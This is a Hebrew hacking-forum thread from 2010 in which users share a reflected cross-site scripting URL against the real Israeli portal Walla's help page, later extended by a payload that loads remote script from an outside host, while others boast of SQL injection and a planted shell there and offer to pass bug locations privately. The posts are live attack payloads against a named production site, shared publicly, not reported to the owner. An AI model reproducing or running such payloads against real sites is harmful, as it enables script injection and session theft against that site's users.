הפורומים של Hacking.org.il עמוד ראשי    שאלות נפוצות    חיפוש    רשימת חברים    קבוצות משתמשים    כרטיס אישי    הרשמה    התחבר כדי לבדוק מסרים אישיים    התחבר   
Share |
פרסום | xss walla

 
שליחת הודעה חדשה      תגובה להודעה    עמוד ראשי -> XSS
צפה בנושא הקודם :: צפה בנושא הבא  
מחבר הודעה
Lerugan
משתמש חדש


הצטרף בתאריך: 02/03/2010 ב- 14:44:08
הודעות: 40

הודעהנשלח: ג' 03 02, 2010 2:45 pm    כותרת הודעה: פרסום | xss walla תגובה עם ציטוט

הנה לכם XSS שניתן לנצל באתר של walla:
קוד:
http://help.walla.co.il/ts.cgi?w=1/@feedback&tname=<h1>Lerugan</h1>

תהנו מחייך
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
shoval132
משתמש חדש


הצטרף בתאריך: 26/09/2009 ב- 22:26:37
הודעות: 35

הודעהנשלח: ג' 03 02, 2010 3:03 pm    כותרת הודעה: תגובה עם ציטוט

תודה
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
Buka
משתמש פעיל מאוד


הצטרף בתאריך: 24/02/2009 ב- 22:28:44
הודעות: 2776
מיקום: בגוגל

הודעהנשלח: ג' 03 02, 2010 3:29 pm    כותרת הודעה: תגובה עם ציטוט

מוכר
_________________
PicZhare - העלאת תמונות - פתיחת גלריה - אימל אנונימי
http://tinyurl.com/2atcw5z
LIKE ME:P
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
Eraco
משתמש


הצטרף בתאריך: 08/10/2007 ב- 16:34:21
הודעות: 268
מיקום: פה כבר הרבה זמן

הודעהנשלח: ג' 03 02, 2010 4:20 pm    כותרת הודעה: תגובה עם ציטוט

שכחתי כבר איך וואלה נראה
_________________
בברכה, עופרי מחייך

מערכת מודולרית לניהול אתרים פרטיים , מצעד ההורדות - הורדות ישיררות של המצעד הלועזי
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
exx8
משתמש פעיל מאוד


הצטרף בתאריך: 12/06/2009 ב- 20:20:40
הודעות: 1040

הודעהנשלח: ג' 03 02, 2010 5:49 pm    כותרת הודעה: תגובה עם ציטוט

אממ, אני חושב שחשפו את זה כבר,
בכל אופן ל-walla יש הרבה באגים ובעיות אבטחה, במיוחד xss...
_________________
פרוקסי חדש:
http://exx8proxy.tk/
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
pepo
משתמש


הצטרף בתאריך: 29/10/2009 ב- 13:52:07
הודעות: 165

הודעהנשלח: ג' 03 02, 2010 6:24 pm    כותרת הודעה: תגובה עם ציטוט

לול ההיתי מת לדעת איך עושים דברים כאלה אפילו שאני יודע js אני לא ממש מבין איך עושים תהזרקות האלה =)
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
exx8
משתמש פעיל מאוד


הצטרף בתאריך: 12/06/2009 ב- 20:20:40
הודעות: 1040

הודעהנשלח: ג' 03 02, 2010 6:42 pm    כותרת הודעה: תגובה עם ציטוט

pepo כתב:
לול ההיתי מת לדעת איך עושים דברים כאלה אפילו שאני יודע js אני לא ממש מבין איך עושים תהזרקות האלה =)

בוא נגיד שיש לך הזרקה פה (במקום $a):
קוד:

<img src="$a">

בעזרת אילו תווים תוכל להטות את הדף?
_________________
פרוקסי חדש:
http://exx8proxy.tk/
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
pepo
משתמש


הצטרף בתאריך: 29/10/2009 ב- 13:52:07
הודעות: 165

הודעהנשלח: ג' 03 02, 2010 7:19 pm    כותרת הודעה: תגובה עם ציטוט

exx8 כתב:
pepo כתב:
לול ההיתי מת לדעת איך עושים דברים כאלה אפילו שאני יודע js אני לא ממש מבין איך עושים תהזרקות האלה =)

בוא נגיד שיש לך הזרקה פה (במקום $a):
קוד:

<img src="$a">

בעזרת אילו תווים תוכל להטות את הדף?


לא כן הבנתי איפה הזרקות והכל אבל לא הבנתי איך דרך js אתה עושה את זה גם יש דרכים דרך הכתובת שגם אותם אני לא יודע...
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
blamandk
משתמש


הצטרף בתאריך: 23/11/2009 ב- 19:44:24
הודעות: 229

הודעהנשלח: ג' 03 02, 2010 7:20 pm    כותרת הודעה: תגובה עם ציטוט

וואלה מלא בפריצות אפילו הצליחו לעלות לשם שאלל
מרוב שהם פיצצו בהרבה תוכן קשה להם לאבטח את הכול
בכל זאת תודה מחייך
_________________
------------------------------
עד המוות ביתר גם אם זה כואב
------------------------------
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
exx8
משתמש פעיל מאוד


הצטרף בתאריך: 12/06/2009 ב- 20:20:40
הודעות: 1040

הודעהנשלח: ג' 03 02, 2010 7:27 pm    כותרת הודעה: תגובה עם ציטוט

blamandk כתב:
וואלה מלא בפריצות אפילו הצליחו לעלות לשם שאלל
מרוב שהם פיצצו בהרבה תוכן קשה להם לאבטח את הכול
בכל זאת תודה מחייך

אין מצב שהעלית שאלל
xss קשה להם לראות כי זה משפיע על הדפדפן שלך בלבד.
פה אתה משפיע, על הקבצים שלהם, ועל הלוגים שלהם לגבי הקבצים, כל עוד אתה אחד מעשר אלף יהיה קשה למצוא אותך,כאן אתה אחד מ-5, מה עוד שלדעתי הם לא משתמשים ב-php
_________________
פרוקסי חדש:
http://exx8proxy.tk/
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
blamandk
משתמש


הצטרף בתאריך: 23/11/2009 ב- 19:44:24
הודעות: 229

הודעהנשלח: ג' 03 02, 2010 7:48 pm    כותרת הודעה: תגובה עם ציטוט

הצליחו לעלות לשם שאלל (לא אני)
וחוץ אין להם רק xss יש שם גם sqli (ועוד הרבה באגים)
ואם אתה לא מאמין אם רוצה אפילו אני יכול לשלוח לך בפרטי..
_________________
------------------------------
עד המוות ביתר גם אם זה כואב
------------------------------
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי
Bralo00



הצטרף בתאריך: 06/03/2010 ב- 21:34:12
הודעות: 365
מיקום: מרכז

הודעהנשלח: ב' 03 08, 2010 7:44 am    כותרת הודעה: תגובה עם ציטוט

זה שמעלי שלח לי בפרטי מקומות עם באגים לוואלה אני יחקור את העיניין ....
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי MSN Messenger
wofer
משתמש חדש


הצטרף בתאריך: 06/04/2010 ב- 17:37:15
הודעות: 5
מיקום: Jr

הודעהנשלח: ד' 04 07, 2010 11:25 am    כותרת הודעה: תגובה עם ציטוט

http://help.walla.co.il/ts.cgi?w=1/@feedback&tname=<SCRIPT/XSS%20SRC="http://ha.ckers.org/xss.js"></SCRIPT>
תנסה דרך זה ככה אפשר מקובץ חיצוני.
חזור למעלה
צפה בכרטיס האישי של המשתמש שלח מסר אישי בקר באתר הבית של המשתמש
הצג הודעות קודמות:   
שליחת הודעה חדשה      תגובה להודעה    עמוד ראשי -> XSS כל הזמנים הם שעון ישראל (GMT + שעתיים)
עמוד 1 מתוך 1

 
עבור:  
אתה לא יכול לשלוח הודעות בפורום זה
אתה לא יכול להגיב להודעות בפורום זה
אתה לא יכול לערוך את הודעותיך בפורום זה
אתה לא יכול למחוק את הודעותיך בפורום זה
אתה לא יכול להצביע למשאלים בפורום זה



Powered By phpBB © 2001-2007 phpBB Group
rewritten by phpBBHebrew Crew - phpBBhebrew © 2007
alines Template translate by DoctorEvil From -> PHP Translate.
Hebrew template images, the logo and some fixes by MrM (Ofer Mustigman).
Design by SkaidonDesigns | Distributed by Olate